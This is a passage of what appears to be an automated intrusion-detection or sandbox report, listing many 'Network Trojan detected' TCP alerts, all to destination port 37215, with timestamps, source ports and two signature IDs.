          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446228
          SID:2829579
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018519
          SID:2829579
          Source Port:41034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548791
          SID:2829579
          Source Port:46572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241290
          SID:2835222
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782583
          SID:2835222
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709423
          SID:2829579
          Source Port:53464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781643
          SID:2829579
          Source Port:49626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444110
          SID:2829579
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449681
          SID:2829579
          Source Port:52460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516371
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793152
          SID:2829579
          Source Port:33512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262413
          SID:2835222
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734045
          SID:2829579
          Source Port:55512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.833538
          SID:2835222
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037263
          SID:2835222
          Source Port:59338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706934
          SID:2835222
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516997
          SID:2829579
          Source Port:56676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542784
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162850
          SID:2829579
          Source Port:55662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912831
          SID:2835222
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673004
          SID:2829579
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598754
          SID:2835222
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016234
          SID:2835222
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299497
          SID:2835222
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789754
          SID:2829579
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161717
          SID:2829579
          Source Port:42422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461852
          SID:2829579
          Source Port:45514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729732
          SID:2829579
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274843
          SID:2829579
          Source Port:59438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407207
          SID:2829579
          Source Port:50750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516804
          SID:2829579
          Source Port:45678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172924
          SID:2829579
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395154
          SID:2829579
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188724
          SID:2829579
          Source Port:54060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059303
          SID:2829579
          Source Port:33374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112218
          SID:2829579
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356577
          SID:2829579
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035552
          SID:2829579
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857344
          SID:2835222
          Source Port:53882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016058
          SID:2835222
          Source Port:48672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897857
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512154
          SID:2829579
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884625
          SID:2835222
          Source Port:56890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192545
          SID:2835222
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748957
          SID:2835222
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470702
          SID:2829579
          Source Port:34974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128180
          SID:2835222
          Source Port:54760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396190
          SID:2829579
          Source Port:58424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270502
          SID:2829579
          Source Port:50460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707196
          SID:2835222
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174083
          SID:2835222
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796519
          SID:2835222
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669712
          SID:2835222
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043707
          SID:2829579
          Source Port:54702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600036
          SID:2829579
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820690
          SID:2829579
          Source Port:45100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806677
          SID:2829579
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495952
          SID:2835222
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599017
          SID:2835222
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606106
          SID:2835222
          Source Port:58850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884401
          SID:2835222
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175962
          SID:2829579
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233639
          SID:2835222
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242480
          SID:2835222
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037029
          SID:2835222
          Source Port:43418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738969
          SID:2835222
          Source Port:57906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354587
          SID:2835222
          Source Port:59020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161770
          SID:2835222
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191773
          SID:2835222
          Source Port:40012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749174
          SID:2829579
          Source Port:50742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888107
          SID:2829579
          Source Port:43778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017008
          SID:2835222
          Source Port:54560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179477
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176462
          SID:2829579
          Source Port:44080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709471
          SID:2829579
          Source Port:52088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744994
          SID:2835222
          Source Port:35170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259133
          SID:2835222
          Source Port:58128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179640
          SID:2829579
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516375
          SID:2829579
          Source Port:37210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242409
          SID:2835222
          Source Port:56658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057856
          SID:2829579
          Source Port:49616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158636
          SID:2835222
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276176
          SID:2829579
          Source Port:46584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850667
          SID:2835222
          Source Port:37658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804323
          SID:2835222
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732604
          SID:2829579
          Source Port:49194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273231
          SID:2835222
          Source Port:34836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233524
          SID:2829579
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071168
          SID:2829579
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892164
          SID:2829579
          Source Port:56218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812650
          SID:2829579
          Source Port:39484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351468
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2835222
          Source Port:37648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153499
          SID:2835222
          Source Port:51604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855306
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444761
          SID:2835222
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2835222
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674428
          SID:2829579
          Source Port:48040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160298
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843771
          SID:2829579
          Source Port:52216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465663
          SID:2835222
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353153
          SID:2835222
          Source Port:59294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404624
          SID:2829579
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396820
          SID:2829579
          Source Port:58374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707400
          SID:2835222
          Source Port:35998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901503
          SID:2835222
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353674
          SID:2829579
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738908
          SID:2835222
          Source Port:35328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239157
          SID:2829579
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306463
          SID:2835222
          Source Port:56722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161678
          SID:2829579
          Source Port:53480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354495
          SID:2835222
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018940
          SID:2829579
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545630
          SID:2829579
          Source Port:48634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113147
          SID:2829579
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272864
          SID:2829579
          Source Port:59990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442486
          SID:2835222
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598990
          SID:2829579
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158478
          SID:2829579
          Source Port:58626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552304
          SID:2835222
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894435
          SID:2829579
          Source Port:51538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041235
          SID:2835222
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035637
          SID:2829579
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795180
          SID:2835222
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896047
          SID:2835222
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603059
          SID:2835222
          Source Port:42590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178204
          SID:2835222
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241390
          SID:2835222
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801127
          SID:2829579
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746178
          SID:2829579
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099470
          SID:2835222
          Source Port:40130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744341
          SID:2829579
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.804922
          SID:2835222
          Source Port:54524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550063
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404645
          SID:2835222
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466353
          SID:2835222
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021532
          SID:2829579
          Source Port:33698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192412
          SID:2835222
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303157
          SID:2829579
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353049
          SID:2835222
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.361770
          SID:2835222
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797604
          SID:2829579
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350708
          SID:2829579
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514447
          SID:2829579
          Source Port:47654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403522
          SID:2835222
          Source Port:40848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271562
          SID:2835222
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708381
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730804
          SID:2835222
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099356
          SID:2829579
          Source Port:50722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352368
          SID:2829579
          Source Port:40296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788158
          SID:2835222
          Source Port:46308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160557
          SID:2829579
          Source Port:36888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796675
          SID:2829579
          Source Port:59660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860805
          SID:2829579
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747911
          SID:2835222
          Source Port:48350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595078
          SID:2835222
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704153
          SID:2835222
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036281
          SID:2835222
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843974
          SID:2835222
          Source Port:52712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067976
          SID:2829579
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466165
          SID:2829579
          Source Port:54544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850587
          SID:2835222
          Source Port:49376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111228
          SID:2835222
          Source Port:51966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403863
          SID:2829579
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862019
          SID:2835222
          Source Port:49984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354200
          SID:2835222
          Source Port:45170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407688
          SID:2829579
          Source Port:56570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378425
          SID:2829579
          Source Port:45788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179300
          SID:2829579
          Source Port:56902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513600
          SID:2835222
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178617
          SID:2829579
          Source Port:58866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159474
          SID:2829579
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808882
          SID:2829579
          Source Port:53920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813294
          SID:2835222
          Source Port:44978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788824
          SID:2835222
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799420
          SID:2835222
          Source Port:42704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884275
          SID:2829579
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898170
          SID:2835222
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407030
          SID:2829579
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440854
          SID:2835222
          Source Port:53118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894802
          SID:2829579
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2829579
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512921
          SID:2829579
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464985
          SID:2829579
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555203
          SID:2835222
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794140
          SID:2835222
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353163
          SID:2829579
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355542
          SID:2835222
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444642
          SID:2829579
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783148
          SID:2835222
          Source Port:55420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517111
          SID:2829579
          Source Port:45474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352790
          SID:2829579
          Source Port:46112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351868
          SID:2829579
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108157
          SID:2835222
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731290
          SID:2835222
          Source Port:46586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160614
          SID:2829579
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
